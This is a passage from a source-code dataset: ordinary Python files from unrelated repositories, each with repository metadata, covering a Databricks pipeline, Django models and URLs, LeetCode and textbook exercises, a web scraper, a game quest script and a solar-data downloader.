outputs, hidden = self.gru(batch)
out_size = int(outputs.size(2) / 2)
if add_output:
outputs = outputs[:, :, :out_size] + outputs[:, :, out_size:]
return outputs
authors: ["[email protected]"]
blob_id: 39aeb6e973594342d29c7e0c62856e9bdb055bea | directory_id: e5ee4f343d9523129298e1cd989b52a142028cfe
path: /samples/contrib/azure-samples/databricks-pipelines/databricks_cluster_pipeline.py | content_id: 4cbd45e50b4cab9d62b7e153d21fb6660ecc37ea
detected_licenses: ["Apache-2.0"] | license_type: permissive | repo_name: joaoalvarenga/pipelines
snapshot_id: 67c5b2c906134be8d4814a0851e4b60dfa4adf44 | revision_id: 493c3d4e980b94a963a257247c6eb2d970b3dafa | branch_name: refs/heads/master
visit_date: 2020-12-08T18:22:52.433779 | revision_date: 2020-01-10T05:00:34 | committer_date: 2020-01-10T05:00:34
github_id: 233,059,234 | star_events_count: 1 | fork_events_count: 0
gha_license_id: Apache-2.0 | gha_event_created_at: 2020-01-10T14:03:36 | gha_created_at: 2020-01-10T14:03:35 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,780 | extension: py
content:
"""Create a cluster in Databricks. Then submit a one-time Run to that cluster."""
import kfp.dsl as dsl
import kfp.compiler as compiler
import databricks
def create_cluster(cluster_name):
return databricks.CreateClusterOp(
name="createcluster",
cluster_name=cluster_name,
spark_version="5.3.x-scala2.11",
node_type_id="Standard_D3_v2",
spark_conf={
"spark.speculation": "true"
},
num_workers=2
)
def submit_run(run_name, cluster_id, parameter):
return databricks.SubmitRunOp(
name="submitrun",
run_name=run_name,
existing_cluster_id=cluster_id,
libraries=[{"jar": "dbfs:/docs/sparkpi.jar"}],
spark_jar_task={
"main_class_name": "org.apache.spark.examples.SparkPi",
"parameters": [parameter]
}
)
def delete_run(run_name):
return databricks.DeleteRunOp(
name="deleterun",
run_name=run_name
)
def delete_cluster(cluster_name):
return databricks.DeleteClusterOp(
name="deletecluster",
cluster_name=cluster_name
)
@dsl.pipeline(
name="DatabricksCluster",
description="A toy pipeline that computes an approximation to pi with Azure Databricks."
)
def calc_pipeline(cluster_name="test-cluster", run_name="test-run", parameter="10"):
create_cluster_task = create_cluster(cluster_name)
submit_run_task = submit_run(run_name, create_cluster_task.outputs["cluster_id"], parameter)
delete_run_task = delete_run(run_name)
delete_run_task.after(submit_run_task)
delete_cluster_task = delete_cluster(cluster_name)
delete_cluster_task.after(delete_run_task)
if __name__ == "__main__":
compiler.Compiler().compile(calc_pipeline, __file__ + ".tar.gz")
authors: ["[email protected]"]
blob_id: 5b46996c84345b6406c48c03241e97ddfdbd1ac8 | directory_id: d066f7fe739fb78f74ec2de8ccbfefdd4270f60f
path: /appimagebuilder/__init__.py | content_id: 5b4148a08e2776e617d6700c316eba5fc4629b93
detected_licenses: ["MIT"] | license_type: permissive | repo_name: AppImageCrafters/appimage-builder
snapshot_id: 666e75363a74f615cdb3673b3ca9d51a6d292a49 | revision_id: f38699ef3644fa5409a5a262b7b6d99d6fb85db9 | branch_name: refs/heads/main
visit_date: 2023-08-17T06:34:54.029664 | revision_date: 2023-06-03T17:51:04 | committer_date: 2023-06-03T17:51:04
github_id: 218,847,680 | star_events_count: 270 | fork_events_count: 54
gha_license_id: MIT | gha_event_created_at: 2023-09-06T17:04:18 | gha_created_at: 2019-10-31T19:44:17 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 651 | extension: py
content:
#!/usr/bin/env python3
# Copyright 2020 Alexis Lopez Zubieta
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
authors: ["[email protected]"]
blob_id: 15d2b575651bdea86b38c0e958fcaf83eaae4442 | directory_id: 760fbf0e4675212a89dbba28ef771bf7ff7a0d91
path: /Leetcode2019/145. 二叉树的后序遍历.py | content_id: 06d8fc7c4c1096758d26866d0f867745ac54876d
detected_licenses: [] | license_type: no_license | repo_name: chixujohnny/Leetcode
snapshot_id: 1a420e318005140a2be036ab7c3fcd054b4ae011 | revision_id: 3faa41556f13f45a08b49d4dcd371ed590f9cb14 | branch_name: refs/heads/master
visit_date: 2021-06-19T14:44:28.464335 | revision_date: 2021-01-11T08:16:26 | committer_date: 2021-01-11T08:16:26
github_id: 155,142,704 | star_events_count: 1 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 563 | extension: py
content:
# coding: utf-8
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def postorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
res = []
def helper(root):
if root == None:
return
helper(root.left)
helper(root.right)
res.append(root.val)
helper(root)
return res
authors: ["[email protected]"]
blob_id: 7dcbcaa847c475cb4d1f139f4cd8eb41abab09cb | directory_id: 2f989d067213e7a1e19904d482a8f9c15590804c
path: /lib/python3.4/site-packages/django/contrib/contenttypes/apps.py | content_id: e5708adc99840e3b4a4bc3212d26d134a8462203
detected_licenses: ["MIT"] | license_type: permissive | repo_name: levabd/smart4-portal
snapshot_id: beb1cf8847134fdf169ab01c38eed7e874c66473 | revision_id: 2c18ba593ce7e9a1e17c3559e6343a14a13ab88c | branch_name: refs/heads/master
visit_date: 2023-02-18T05:49:40.612697 | revision_date: 2022-08-02T09:35:34 | committer_date: 2022-08-02T09:35:34
github_id: 116,001,098 | star_events_count: 0 | fork_events_count: 1
gha_license_id: MIT | gha_event_created_at: 2023-02-15T21:34:01 | gha_created_at: 2018-01-02T10:00:07 | gha_language: Roff
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 693 | extension: py
content:
from django.apps import AppConfig
from django.contrib.contenttypes.checks import check_generic_foreign_keys
from django.core import checks
from django.db.models.signals import post_migrate, pre_migrate
from django.utils.translation import ugettext_lazy as _
from .management import (
inject_rename_contenttypes_operations, update_contenttypes,
)
class ContentTypesConfig(AppConfig):
name = 'django.contrib.contenttypes'
verbose_name = _("Content Types")
def ready(self):
pre_migrate.connect(inject_rename_contenttypes_operations, sender=self)
post_migrate.connect(update_contenttypes)
checks.register(check_generic_foreign_keys, checks.Tags.models)
authors: ["[email protected]"]
blob_id: 59e22f98d350ea5b45fcfb9fc47ea110043bdec0 | directory_id: 9556f7e1d81a305d71a66b9768eba199e396d733
path: /Thread/venv/bin/pip | content_id: 698fcef12df25482e9901a7aecb433703142f6b8
detected_licenses: [] | license_type: no_license | repo_name: gitgaoqian/Python
snapshot_id: 301a2823b50ec754a2c1a3f47c39ae8b0b8e6890 | revision_id: 164f5271044b235d256a9bbe0a34caacf1e81fc8 | branch_name: refs/heads/master
visit_date: 2023-01-08T21:23:59.640828 | revision_date: 2020-11-01T13:06:21 | committer_date: 2020-11-01T13:06:21
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 394
content:
#!/home/ros/pycharm/MyFiles/thread/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip')()
)
authors: ["[email protected]"]
blob_id: 01b2be76c7a39b05d6db36b19dba8018456848d3 | directory_id: 53fab060fa262e5d5026e0807d93c75fb81e67b9
path: /backup/user_125/ch22_2020_03_02_20_28_19_768242.py | content_id: 6c3da9295a0c587ec5b4d1b65f83ce4882ba77e4
detected_licenses: [] | license_type: no_license | repo_name: gabriellaec/desoft-analise-exercicios
snapshot_id: b77c6999424c5ce7e44086a12589a0ad43d6adca | revision_id: 01940ab0897aa6005764fc220b900e4d6161d36b | branch_name: refs/heads/main
visit_date: 2023-01-31T17:19:42.050628 | revision_date: 2020-12-16T05:21:31 | committer_date: 2020-12-16T05:21:31
github_id: 306,735,108 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 143 | extension: py
content:
dias = int(input('quantos cigarros voce fuma por dia ? '))
anos = int(input('há quantos anos voce fuma?' ))
print ((anos*365*24*60)*dias*144)
authors: ["[email protected]"]
blob_id: dba2f8e1a2489ee8595497efbce2fbe54822fbb2 | directory_id: c8a04384030c3af88a8e16de4cedc4ef8aebfae5
path: /stubs/pandas/tests/indexes/test_setops.pyi | content_id: 3493fb22582660788efeadee60d6a7bc60cb4307
detected_licenses: ["MIT"] | license_type: permissive | repo_name: Accern/accern-xyme
snapshot_id: f61fce4b426262b4f67c722e563bb4297cfc4235 | revision_id: 6ed6c52671d02745efabe7e6b8bdf0ad21f8762c | branch_name: refs/heads/master
visit_date: 2023-08-17T04:29:00.904122 | revision_date: 2023-05-23T09:18:09 | committer_date: 2023-05-23T09:18:09
github_id: 226,960,272 | star_events_count: 3 | fork_events_count: 2
gha_license_id: MIT | gha_event_created_at: 2023-07-19T02:13:18 | gha_created_at: 2019-12-09T20:21:59 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 660 | extension: pyi
content:
# Stubs for pandas.tests.indexes.test_setops (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level
from typing import Any
COMPATIBLE_INCONSISTENT_PAIRS: Any
def index_pair(request: Any) -> Any:
...
def test_union_same_types(indices: Any) -> None:
...
def test_union_different_types(index_pair: Any) -> None:
...
def test_compatible_inconsistent_pairs(idx_fact1: Any, idx_fact2: Any) -> None:
...
def test_union_dtypes(left: Any, right: Any, expected: Any) -> None:
...
authors: ["[email protected]"]
blob_id: cc6016e65e7b3e125b87d996e95b98ff5f2a1e52 | directory_id: c17ca7a7824056f7ad58d0f71abc25670b20c1fc
path: /spirit/urls/admin/__init__.py | content_id: 1bc65e9f0daf9e9e944ad49a9811b0f1d6942c43
detected_licenses: ["Apache-2.0"] | license_type: permissive | repo_name: Si-elegans/Web-based_GUI_Tools
snapshot_id: cd35b72e80aa400105593c5c819355437e204a81 | revision_id: 58a9b7a76bc46467554192a38ff5329a94e2b627 | branch_name: refs/heads/master
visit_date: 2023-01-11T09:11:21.896172 | revision_date: 2017-07-18T11:10:31 | committer_date: 2017-07-18T11:10:31
github_id: 97,445,306 | star_events_count: 3 | fork_events_count: 1
gha_license_id: Apache-2.0 | gha_event_created_at: 2022-12-26T20:14:59 | gha_created_at: 2017-07-17T07:03:13 | gha_language: JavaScript
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 536 | extension: py
content:
#-*- coding: utf-8 -*-
from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^$', 'spirit.views.admin.index.dashboard', name='admin'),
url(r'^index/', include('spirit.urls.admin.index')),
url(r'^category/', include('spirit.urls.admin.category')),
url(r'^comment/flag/', include('spirit.urls.admin.comment_flag')),
url(r'^config/', include('spirit.urls.admin.config')),
url(r'^topic/', include('spirit.urls.admin.topic')),
url(r'^user/', include('spirit.urls.admin.user')),
)
authors: ["[email protected]"]
blob_id: 1d8542da9fe05431ce0785b0c97e19b60e7aec39 | directory_id: e15ec378360536d5215bf0f0a8fa9ab8a41ff6cc
path: /ch06/p6-3-1.py | content_id: 344f657d4d90d4170ca1d407f4091c37e6166324
detected_licenses: [] | license_type: no_license | repo_name: michlin0825/book-mP21926
snapshot_id: 2ece5685ded2c913f51c830fd6f3280b8394646f | revision_id: 5c4ebd828e593efd5fc7ba40bbcf606babd52640 | branch_name: refs/heads/main
visit_date: 2023-01-02T05:48:49.832014 | revision_date: 2020-10-12T02:22:21 | committer_date: 2020-10-12T02:22:21
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 433 | extension: py
content:
from selenium import webdriver
from bs4 import BeautifulSoup
import time
url = 'https://www.cwb.gov.tw/V8/C/W/OBS_County.html?ID=menu'
web = webdriver.Chrome('chromedriver.exe')
web.implicitly_wait(60)
web.get(url)
html = web.page_source
web.quit()
soup = BeautifulSoup(html, 'html.parser')
target = soup.select('#County option')
counties = list()
for item in target:
counties.append((item.text,item['value']))
print(counties)
authors: ["[email protected]"]
blob_id: 0c826b71c27b17e526b9807cbca19ce674539404 | directory_id: b57d337ddbe946c113b2228a0c167db787fd69a1
path: /scr/py00468notices.py | content_id: c8f23c8ddfd5182e7ed018cb580fa0c212a0c0c1
detected_licenses: [] | license_type: no_license | repo_name: aademchenko/ToEE
snapshot_id: ebf6432a75538ae95803b61c6624e65b5cdc53a1 | revision_id: dcfd5d2de48b9d9031021d9e04819b309d71c59e | branch_name: refs/heads/master
visit_date: 2020-04-06T13:56:27.443772 | revision_date: 2018-11-14T09:35:57 | committer_date: 2018-11-14T09:35:57
github_id: 157,520,715 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,612 | extension: py
content:
from toee import *
from utilities import *
import _include
from co8Util.TimedEvent import *
from combat_standard_routines import *
from py00439script_daemon import get_f, set_f, get_v, set_v, tpsts, record_time_stamp
def san_use( attachee, triggerer ):
if (attachee.name == 11063):
game.quests[110].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11064):
game.quests[90].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11065):
game.quests[111].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11066):
game.quests[112].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11067):
game.quests[108].state = qs_mentioned
game.global_vars[939] = 1
game.new_sid = 0
elif (attachee.name == 11068):
if (game.quests[97].state != qs_botched):
game.quests[97].state = qs_botched
if (game.party[0].reputation_has(53) == 0):
game.party[0].reputation_add( 53 )
game.global_vars[510] = 2
game.global_flags[504] = 1
game.new_sid = 0
elif (attachee.name == 11069):
triggerer.money_adj(-10000)
attachee.destroy()
elif (attachee.name == 11070):
game.quests[106].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11071):
game.quests[95].state = qs_completed
game.new_sid = 0
elif (attachee.name == 11072):
game.quests[105].state = qs_mentioned
set_bethany()
game.new_sid = 0
elif (attachee.name == 11073):
game.quests[105].state = qs_mentioned
set_bethany()
game.new_sid = 0
return RUN_DEFAULT
def set_bethany():
game.encounter_queue.append(3447)
set_f('s_bethany_scheduled')
return RUN_DEFAULT
authors: ["[email protected]"]
blob_id: 4981a7e806be3173914d83131e900e93b70cefac | directory_id: c89f5856fe74cff49a9d96dde9ed0117109e3845
path: /A-bit-of-py/exceptions_raise.py | content_id: 18c685701366068a4acd2f51c1194d541cbb8930
detected_licenses: [] | license_type: no_license | repo_name: sinoclover/python
snapshot_id: b2b3f435d15840ec16a34c62d50308bdfb9d6c3e | revision_id: 02f5347bc8219f1df52486077adf0017fe6d5211 | branch_name: refs/heads/master
visit_date: 2020-08-27T22:14:20.672846 | revision_date: 2019-12-01T13:27:42 | committer_date: 2019-12-01T13:27:42
github_id: 158,791,898 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 647 | extension: py
content:
# encoding=UTF-8
class ShortInputException(Exception):
    '''A user-defined exception class'''
def __init__(self, length, atleast):
Exception.__init__(self)
self.length = length
self.atleast = atleast
try:
text = input('Enter something --> ')
if len(text) < 3:
raise ShortInputException(len(text), 3)
    # Other work can continue normally at this point
except EOFError:
print('Why did you do an EOF on me?')
except ShortInputException as ex:
print(('ShortInputException: The input was {0} long, expected at least {1}').format(ex.length, ex.atleast))
else:
print('No exception was raised')
authors: ["[email protected]"]
blob_id: 4fc31a6ff5a7263512d12b5b20ad20f35c45dff3 | directory_id: 2c510687bdc03fbb8383130e68cc796bfef1088c
path: /3_basic_ds/exercises.py | content_id: 328dff7335a429dab792cb7b5a6f8adc62aeda37
detected_licenses: [] | license_type: no_license | repo_name: jimjshields/pswads
snapshot_id: 59758a0972fe71ca6f77305ff8ab86673d9b5d46 | revision_id: 9568622805e24416f4a227cbecc1ef4927fa7ba3 | branch_name: refs/heads/master
visit_date: 2016-09-06T12:37:53.254464 | revision_date: 2015-02-17T02:13:00 | committer_date: 2015-02-17T02:13:00
github_id: 30,149,564 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,772 | extension: py
content:
# Chapter 3 Programming Exercises
# Skip all pre-/post-/infix questions; not worth the time.
# Also skip any 'experiment' questions. Maybe come back to them.
# 5. Implement the Queue ADT, using a list such that the rear of the queue is at the end of the list.
class Queue(object):
"""Represents a queue ADT. The rear of the queue is the end of the list used.
Necessary methods: enqueue, dequeue, size, is_empty."""
def __init__(self):
"""Initializes an empty queue using a list."""
self.items = []
def enqueue(self, item):
"""Adds an item to the rear of the queue."""
self.items.append(item)
def dequeue(self):
"""Removes and returns an item from the front of the queue."""
return self.items.pop(0)
def size(self):
"""Returns the number of items in the queue."""
return len(self.items)
def is_empty(self):
"""Checks whether the queue has no items."""
return self.items == []
# q = Queue()
# q.enqueue(1)
# q.enqueue(2)
# q.enqueue(3)
# q.enqueue(4)
# q.enqueue(5)
# print q.items
# print q.dequeue()
# print q.dequeue()
# print q.dequeue()
# print q.dequeue()
# print q.dequeue()
# print q.is_empty()
# 7. It is possible to implement a queue such that both enqueue and dequeue have O(1) performance on average: most calls are O(1), except for one particular circumstance in which dequeue is O(n). (A sketch of one such approach follows Queue_2 below.)
class Queue_2(object):
"""Represents a queue ADT with O(1) enqueue and dequeue time on average."""
def __init__(self):
"""Initializes an empty queue with a list.
Also initializes the dequeue variable for O(1) access time."""
self.items = []
self.to_be_dequeued = ''
def enqueue(self, item):
self.items.append(item)
self.to_be_dequeued = self.items[0]
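The stored file is truncated here (length_bytes is 1,772), so Queue_2 never gets its dequeue. A minimal sketch of the amortized-O(1) technique the exercise comment describes, assuming a two-list design rather than the original author's (unknown) solution:

```python
class AmortizedQueue(object):
    """Queue with amortized O(1) enqueue and dequeue, built on two lists."""

    def __init__(self):
        self._in = []   # receives enqueued items
        self._out = []  # serves dequeues in FIFO order

    def enqueue(self, item):
        """Always O(1): append to the inbound list."""
        self._in.append(item)

    def dequeue(self):
        """O(1) amortized; raises IndexError when the queue is empty."""
        if not self._out:
            # The one O(n) circumstance: move everything across, reversed,
            # so that list.pop() now yields items in arrival order.
            while self._in:
                self._out.append(self._in.pop())
        return self._out.pop()
```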
authors: ["[email protected]"]
blob_id: e103e52c8d1db2ceda089eb62bb3d134391fee80 | directory_id: 102a33464fd3a16ceedd134e9c64fea554ca5273
path: /apps/config/models.py | content_id: 39260020ed66b83fc8e77d4bf08ecae9ee053a6b
detected_licenses: [] | license_type: no_license | repo_name: pythonguru101/django-ecommerce
snapshot_id: b688bbe2b1a53c906aa80f86f764cf9787e6c2fe | revision_id: f94de9c21223716db5ffcb86ba87219da88d2ff4 | branch_name: refs/heads/master
visit_date: 2020-07-24T14:57:02.047702 | revision_date: 2020-06-10T06:06:23 | committer_date: 2020-06-10T06:06:23
github_id: 207,961,132 | star_events_count: 1 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,658 | extension: py
content:
# encoding: utf-8
from django.db import models
from django.utils.translation import ugettext as _
class ConfigAbstractManager(models.Manager):
def get_config(self):
try:
return self.get(pk=1)
except self.model.DoesNotExist:
return {}
class ConfigAbstract(models.Model):
text_main_bot = models.TextField(_(u'текст на главной внизу'), blank=True)
phone = models.CharField(_(u'номер телефона'), max_length=32, blank=True)
email = models.EmailField(_(u'email'), blank=True)
title_page = models.CharField(_(u'заголовок страницы'), max_length=140,
blank=True)
meta_keywords = models.CharField(_(u'meta keywords'), max_length=200,
blank=True)
meta_description = models.TextField(_(u'meta description'), blank=True)
yandex_verification = models.CharField(_(u'Yandex Verification'),
max_length=100, blank=True)
yml_name = models.CharField(_(u'YML: name'), max_length=250)
yml_email = models.EmailField(_(u'YML: email'))
yml_company = models.CharField(_(u'YML: company'), max_length=250)
objects = ConfigAbstractManager()
class Meta:
abstract = True
verbose_name = _(u'настройки')
verbose_name_plural = _(u'настройки')
def __unicode__(self):
return u'настройки'
def save(self, *args, **kwargs):
self.pk = 1
return super(ConfigAbstract, self).save(*args, **kwargs)
class ConfigManagerManager(models.Manager):
def get_emails(self):
return [m['email'] for m in self.values('email')]
class Config(ConfigAbstract):
title_blog = models.CharField(_(u'заголовок блога'), max_length=140,
blank=True)
facebook_app_id = models.CharField(_(u'FaceBook App ID'), max_length=100,
blank=True)
afrek_id = models.CharField(_(u'Партнёрка afrek.ru'), max_length=100,
blank=True)
class ConfigManager(models.Model):
config = models.ForeignKey(Config,
verbose_name=_(u'менеджер'), on_delete=models.CASCADE)
name = models.CharField(_(u'имя'), max_length=100)
email = models.EmailField(_(u'email'))
objects = ConfigManagerManager()
class Meta:
verbose_name = _(u'менеджер')
verbose_name_plural = _(u'менеджеры')
def __unicode__(self):
return "%s <%s>" % (self.name, self.email)
authors: ["[email protected]"]
blob_id: fa27bce37bd4a31c0734171d2f4b56a9949bad56 | directory_id: d52413173437ba73ecdf822ca895e659f00a8ce7
path: /kiwibackend/application/module/artifact/migrations/0003_auto_20151209_1606.py | content_id: 66ae6b692b0125f17dbbc5170a7fce62dbc9ac44
detected_licenses: [] | license_type: no_license | repo_name: whiteprism/mywork
snapshot_id: 2329b3459c967c079d6185c5acabd6df80cab8ea | revision_id: a8e568e89744ca7acbc59e4744aff2a0756d7252 | branch_name: refs/heads/master
visit_date: 2021-01-21T11:15:49.090408 | revision_date: 2017-03-31T03:28:13 | committer_date: 2017-03-31T03:28:13
github_id: 83,540,646 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 946 | extension: py
content:
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('artifact', '0002_auto_20150914_0908'),
]
operations = [
migrations.AddField(
model_name='artifact',
name='heroTypeList_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u88c5\u5907\u7684\u82f1\u96c4\u7684\u7c7b\u578b'),
),
migrations.AddField(
model_name='artifact',
name='searchDifficuty_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361\u96be\u5ea6'),
),
migrations.AddField(
model_name='artifact',
name='searchInstances_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361'),
),
]
authors: ["[email protected]"]
blob_id: cb1b755acd76f9db92cf7cb4a054a194126f2c56 | directory_id: 2cf87feeebfe128d6c60067e82e5b28b3a84ae45
path: /aracle/data/make3dslices.py | content_id: a5b16c308b96da0c083019c4adf28e64496bd654
detected_licenses: ["MIT"] | license_type: permissive | repo_name: jiwoncpark/aracle
snapshot_id: b536fbea39480b7af96daff1a9c51d2a7f131866 | revision_id: 20aabe27ce65b738b77192242dc89eda612f945e | branch_name: refs/heads/master
visit_date: 2020-06-03T15:21:35.386628 | revision_date: 2019-11-12T17:49:34 | committer_date: 2019-11-12T17:49:34
github_id: 191,626,657 | star_events_count: 1 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 4,320 | extension: py
content:
import drms #pip install drms, astropy, sunpy , skvideo
import numpy as np
import astropy.units as u
import shutil
import os
import datetime
import matplotlib.pyplot as plt
import skvideo.io
from astropy.io import fits
from matplotlib.pyplot import imshow
from PIL import Image
from sunpy.map import Map
from datetime import date, time, datetime, timedelta
workdir = 'C:/Users/alexf/Desktop/HMI_Data/'
fits_dir = workdir + 'fits/'
if not os.path.exists(workdir):
os.mkdir(workdir)
print("Directory " + workdir + "does not exist. Creating...")
start = datetime(2010,5,1,1,0,0)#date time object format is year, month, day, hour, minute, second
end = datetime(2018,5,1,0,0,0)
time_interval = timedelta(minutes = 60) #timedelta will accept weeks,days,hours,minutes and seconds as input
chunk_size = 480 #chunk size is the number of hmi files downloaded in each export call. must be at least 1
export_protocol = 'fits'#using as-is instead of fits will result in important metadata not being downloaded
email = '[email protected]'#use a group email
series = 'hmi.M_720s'
if (end < start):
print("The end date is before the start date. Please select an end date after the start date")
#sys.exit()
if not os.path.exists(fits_dir):
os.mkdir(fits_dir)
print("Directory " + fits_dir + "does not exist. Creating...")
c = drms.Client(email=email, verbose = True)
total = (end-start) // time_interval + 1
print('Downloading ' + str(total) + ' files')
missing_files = []
def download(start,end,chunk_size,time_interval):
current_time = start
while(current_time<end):
if (end-current_time > (time_interval * chunk_size)):
time_chunk = (time_interval * chunk_size)
else:
time_chunk = end-current_time
end_time = current_time + time_chunk
current_timestring = current_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
end_timestring = end_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
query = series + '[' + current_timestring + '-' + end_timestring + '@' + str(time_interval.total_seconds()) + 's]'
print('Query string: ' + query)
try:
r = c.export(query, protocol = export_protocol)
r.download(fits_dir)
exists = os.path.isfile(fits_dir + '.1')
if exists:#if a fits file no longer exists, it will be downloaded as an empty .1 file. this deletes .1 files
os.remove(fits_dir + '.1')
raise ValueError('Fits file no longer exists. Deleting downloaded file...')
except:#if files are missing from the server, the export call fails. this keeps track of missing files
if (chunk_size == 1):
missing_files.append(current_timestring)
else:
download(current_time,end_time,chunk_size//2,time_interval)
current_time = end_time
download(start,end,chunk_size,time_interval)
print(missing_files)
#delete all duplicate files
test = os.listdir(fits_dir)
for item in test:
if item.endswith(".1"):
os.remove(os.path.join(fits_dir, item))
Xdata_dir = workdir + 'Xdata/'
if not os.path.exists(Xdata_dir):
os.mkdir(Xdata_dir)
print("Directory " + Xdata_dir + "does not exist. Creating...")
fits_filenames = os.listdir(fits_dir)
resizing = [256]
for resize in resizing:
resize_dir = Xdata_dir + str(resize)
if os.path.exists(resize_dir):#delete any resizing directories matching the new resizes
shutil.rmtree(resize_dir)
os.makedirs(resize_dir)#creates new resize directories
for filename in fits_filenames: #iterates over fits files and converts to a numpy array
hmi_map = Map(fits_dir + filename)
rotateddata90 = hmi_map.rotate(angle=90*u.deg, order = 0)
rotateddata180 = rotateddata90.rotate(angle=90*u.deg, order = 0)
data = rotateddata180.data
data[np.where(np.isnan(data))] = 0.0 # replacing nans with 0s
print('saving '+filename +' in sizes'+ str(resizing))
for resize in resizing:#resizes and saves numpy array data into given resizes
resized_image = np.array(Image.fromarray(data).resize((resize,resize),Image.LANCZOS))
np.save(Xdata_dir + str(resize) + '/' + filename[:26] + '_'+ str(resize), resized_image)#saves series,time,and resize
authors: ["[email protected]"]
blob_id: 97176f4b2cf2a2706ba0989eee781b449a4cf6b0 | directory_id: 14cdc1353affd01ec9f96c31cd51549d82364b2c
path: /test/IECore/OptionsTest.py | content_id: f257f594de42cc75781eb2db60bfa267e5f96a44
detected_licenses: [] | license_type: no_license | repo_name: dsparrow27/cortex
snapshot_id: f787cdcc271388986cd24ee27b48999ae71ef194 | revision_id: 5e985efa860aec22a0c8ec6cebf9e682f65eca73 | branch_name: refs/heads/master
visit_date: 2021-08-19T06:30:36.881268 | revision_date: 2017-11-23T08:26:13 | committer_date: 2017-11-23T08:26:13
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,627 | extension: py
content:
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
